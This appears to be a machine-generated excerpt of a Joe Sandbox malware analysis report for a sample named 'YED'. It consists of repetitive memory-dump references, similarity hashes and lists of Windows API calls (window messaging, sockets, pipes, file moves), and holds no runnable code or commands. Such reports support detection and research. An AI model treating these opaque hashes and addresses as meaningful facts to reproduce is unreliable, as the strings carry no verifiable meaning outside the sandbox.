                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                • API String ID: 614568839-2785691316
                                                                                                                                                • Opcode ID: c5256cf3a9feed9e633dfe4b735744eae0543ef081582fc04f137023feb890ae
                                                                                                                                                • Instruction ID: c4ab20b70c7ebaf824f1004e489ce3c4f4507563522b0481d37f189ec3c709e9
                                                                                                                                                • Opcode Fuzzy Hash: c5256cf3a9feed9e633dfe4b735744eae0543ef081582fc04f137023feb890ae
                                                                                                                                                • Instruction Fuzzy Hash: B9913871D1021DAFDF14EFA4C891EEEB7B8BF08304F10816AE919A7251DB309A55CFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetMenu.USER32 ref: 002A2183
                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 002A21B5
                                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002A21DD
                                                                                                                                                • _wcslen.LIBCMT ref: 002A2213
                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 002A224D
                                                                                                                                                • GetSubMenu.USER32 ref: 002A225B
                                                                                                                                                  • Part of subcall function 00273A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00273A57
                                                                                                                                                  • Part of subcall function 00273A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,002725B3), ref: 00273A5E
                                                                                                                                                  • Part of subcall function 00273A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00273A65
                                                                                                                                                • PostMessageW.USER32 ref: 002A22E3
                                                                                                                                                  • Part of subcall function 0027E97B: Sleep.KERNEL32 ref: 0027E9F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4196846111-0
                                                                                                                                                • Opcode ID: 1beed92607aca853001ac95809c2e401e27cf464853ada4eaa572ade66e7fb92
                                                                                                                                                • Instruction ID: 9821dc25f5621b68340cc197067f4f2d455e340772dade8fba091bc18a2d2761
                                                                                                                                                • Opcode Fuzzy Hash: 1beed92607aca853001ac95809c2e401e27cf464853ada4eaa572ade66e7fb92
                                                                                                                                                • Instruction Fuzzy Hash: B4718E75A20205EFCB10DFA8C845AAEB7F5EF89310F108499E916EB351DB34ED558F90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen
                                                                                                                                                • String ID: D`L$P`L
                                                                                                                                                • API String ID: 176396367-3785639107
                                                                                                                                                • Opcode ID: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
                                                                                                                                                • Instruction ID: 3c2ba142b6ba3b31ba243049e3680986ecbe346732ca6508d77b5e67fb7c9d3f
                                                                                                                                                • Opcode Fuzzy Hash: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
                                                                                                                                                • Instruction Fuzzy Hash: 3051B931A015269FCB14DF6CC9809BFB7B6BF54324B214229ED66E7284DB39DD81CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                • Opcode ID: a4ccdf16cc7675fe8b1a7ca0bcee6aedef151460f3e0495dbc40f21523be89d9
                                                                                                                                                • Instruction ID: 5ced176a8a424931cbb77ef887358f5291644e80acaad4ee7bf7ff6d4a97474c
                                                                                                                                                • Opcode Fuzzy Hash: a4ccdf16cc7675fe8b1a7ca0bcee6aedef151460f3e0495dbc40f21523be89d9
                                                                                                                                                • Instruction Fuzzy Hash: 7151E5A09243D23DFB3746348845BBB7E995B46314F08C589E1DD858C2C3A998E4D752
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                • Opcode ID: 8fec7f90d36d57d2e732b4a12d90e438e6557c778fd86480196676b2cb1971c1
                                                                                                                                                • Instruction ID: e4c0ceb6dd602218ba96db255ac7fdf71b34e146c160a41181c0ec711e83b14c
                                                                                                                                                • Opcode Fuzzy Hash: 8fec7f90d36d57d2e732b4a12d90e438e6557c778fd86480196676b2cb1971c1
                                                                                                                                                • Instruction Fuzzy Hash: 8C51E6A19247D23EFB378B248C45B7E7E985B86310F08C498E0DD468C3C6B4ECA4D752
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetConsoleCP.KERNEL32 ref: 00245470
                                                                                                                                                • __fassign.LIBCMT ref: 002454EB
                                                                                                                                                • __fassign.LIBCMT ref: 00245506
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00253CD6,00000005,00000000,00000000), ref: 0024552C
                                                                                                                                                • WriteFile.KERNEL32(?,00253CD6,00000000,00245BA3,00000000), ref: 0024554B
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,00245BA3,00000000), ref: 00245584
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                • Opcode ID: 90c86d7da5737bf70c82514a393503c4f06d6cab38bc973a3f4566c93399eac3
                                                                                                                                                • Instruction ID: afc24ad09da0fabbfcb92835f9e50ebd3dd221f93a2e04a6fdf92524668d4dc2
                                                                                                                                                • Opcode Fuzzy Hash: 90c86d7da5737bf70c82514a393503c4f06d6cab38bc973a3f4566c93399eac3
                                                                                                                                                • Instruction Fuzzy Hash: 6B5103B0A10649AFDB15CFA8D885AEEBBF9EF09300F14401AF585E7292D7709A51CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 176396367-0
                                                                                                                                                • Opcode ID: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
                                                                                                                                                • Instruction ID: 0c4138aaa17b5343578a952f30d35949c37f34d6b5a5093ba29508b7b8fe1445
                                                                                                                                                • Opcode Fuzzy Hash: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
                                                                                                                                                • Instruction Fuzzy Hash: CA41B266C1021876CB92EBF488859CFB7A9AF84710F509863F618E3120FB34D255C7A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 029F214B
                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 029F2153
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 029F21E1
                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 029F220C
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 029F2261
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                • String ID: csm
                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                • Opcode ID: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
                                                                                                                                                • Instruction ID: 4451e5eb00f398759bbdf0b9b7ccf9afde6bc5542ef0a29c0de464ccf87ff155
                                                                                                                                                • Opcode Fuzzy Hash: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
                                                                                                                                                • Instruction Fuzzy Hash: 12419334E002099BCB90DF68CC84B9EBBB9BF85368F148156EF156B391D731AA51CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0029304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0029307A
                                                                                                                                                  • Part of subcall function 0029304E: _wcslen.LIBCMT ref: 0029309B
                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00291112
                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00291121
                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 002911C9
                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 002911F9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2675159561-0
                                                                                                                                                • Opcode ID: 0c65e6228be78060b5ba8d775ca571530e87204f961ccbb937e42504004a8c95
                                                                                                                                                • Instruction ID: 6f23f9ed1f3d5518eb6ca7da3d9e1b5f60dd8fb81722cbcc6890e795399570a7
                                                                                                                                                • Opcode Fuzzy Hash: 0c65e6228be78060b5ba8d775ca571530e87204f961ccbb937e42504004a8c95
                                                                                                                                                • Instruction Fuzzy Hash: 1641F431610206AFDB109F15D888BA9BBE9FF45324F248059FD199B291CB74EDA1CFE0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0027CF22,?), ref: 0027DDFD
                                                                                                                                                  • Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0027CF22,?), ref: 0027DE16
                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0027CF45
                                                                                                                                                • MoveFileW.KERNEL32 ref: 0027CF7F
                                                                                                                                                • _wcslen.LIBCMT ref: 0027D005
                                                                                                                                                • _wcslen.LIBCMT ref: 0027D01B
                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 0027D061
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                • String ID: \*.*
                                                                                                                                                • API String ID: 3164238972-1173974218
                                                                                                                                                • Opcode ID: 4cecb8ab323c4226ca60929c9ceceb0f9521dbd5eccb52d5704ba33979f64882
                                                                                                                                                • Instruction ID: 531a4f69491d60919d8edfabd88a29090fc2fd18f233badf67988eb3e0ed4b22
                                                                                                                                                • Opcode Fuzzy Hash: 4cecb8ab323c4226ca60929c9ceceb0f9521dbd5eccb52d5704ba33979f64882
                                                                                                                                                • Instruction Fuzzy Hash: 5B4198718152195FDF12EFB4C981BDDB7B8AF09340F1040E6E50DE7141EA34AA94CF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002A2E1C
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 002A2E4F
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 002A2E84
                                                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002A2EB6
                                                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002A2EE0
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 002A2EF1
                                                                                                                                                • SetWindowLongW.USER32 ref: 002A2F0B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2178440468-0
                                                                                                                                                • Opcode ID: 41e68ef44e226605dde86f651530011c47c435fc9e7807514cd3bbd323718433
                                                                                                                                                • Instruction ID: caed1071d729cf2d7b9616a6ca27bb0ffba8113708ae4efe36e20bf755470caa
                                                                                                                                                • Opcode Fuzzy Hash: 41e68ef44e226605dde86f651530011c47c435fc9e7807514cd3bbd323718433
                                                                                                                                                • Instruction Fuzzy Hash: 6731E230654151EFDB25CF5CED88F6537E5EB8AB10F150164F9049F2A2CB71B8A8DB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00277769
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0027778F
                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00277792
                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 002777B0
                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 002777B9
                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 002777DE
                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 002777EC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                • Opcode ID: fa7ff6e652a80911d657da4c0002790fdc0e0c6fe51f14675691e7ed87f7a27e
                                                                                                                                                • Instruction ID: f427060448ad05bc5bc4c39acd9687d7c7be4eb64b908d39f2cfc6b5ed825204
                                                                                                                                                • Opcode Fuzzy Hash: fa7ff6e652a80911d657da4c0002790fdc0e0c6fe51f14675691e7ed87f7a27e
                                                                                                                                                • Instruction Fuzzy Hash: BA21C476614219AFDF14EFA8DC88CBBB7ECEB0A3647108025F908DB150DA70DC418B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00277842
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00277868
                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0027786B
                                                                                                                                                • SysAllocString.OLEAUT32 ref: 0027788C
                                                                                                                                                • SysFreeString.OLEAUT32 ref: 00277895
                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 002778AF
                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 002778BD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                • Opcode ID: d04fbad5fce6fc09978f9bf3a808d87a45141671018d74d925612995d42b65fe
                                                                                                                                                • Instruction ID: 0127463a3219481e88ce657d375bdc5db2080b60476e7ab89a1476dbe9859dff
                                                                                                                                                • Opcode Fuzzy Hash: d04fbad5fce6fc09978f9bf3a808d87a45141671018d74d925612995d42b65fe
                                                                                                                                                • Instruction Fuzzy Hash: B7219D31619205AFDB10AFA8EC8CDBA77ECEB093607108125F919CB2A1DA70DC51DB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 002804F2
                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0028052E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                • String ID: nul
                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                • Opcode ID: 3092796d825a06032e0fcf0038583961083a1dd765b6f91c1087b901ca2df14b
                                                                                                                                                • Instruction ID: 0323d507b6bb36837dab14ac5b01f4cf7a553812f1eb9345e0733316c2b50298
                                                                                                                                                • Opcode Fuzzy Hash: 3092796d825a06032e0fcf0038583961083a1dd765b6f91c1087b901ca2df14b
                                                                                                                                                • Instruction Fuzzy Hash: 0E21A5795113069FCB20AF29EC84A5A77E4BF45720F604A19F8A1D21E0D7749968CF30
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 002805C6
                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00280601
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
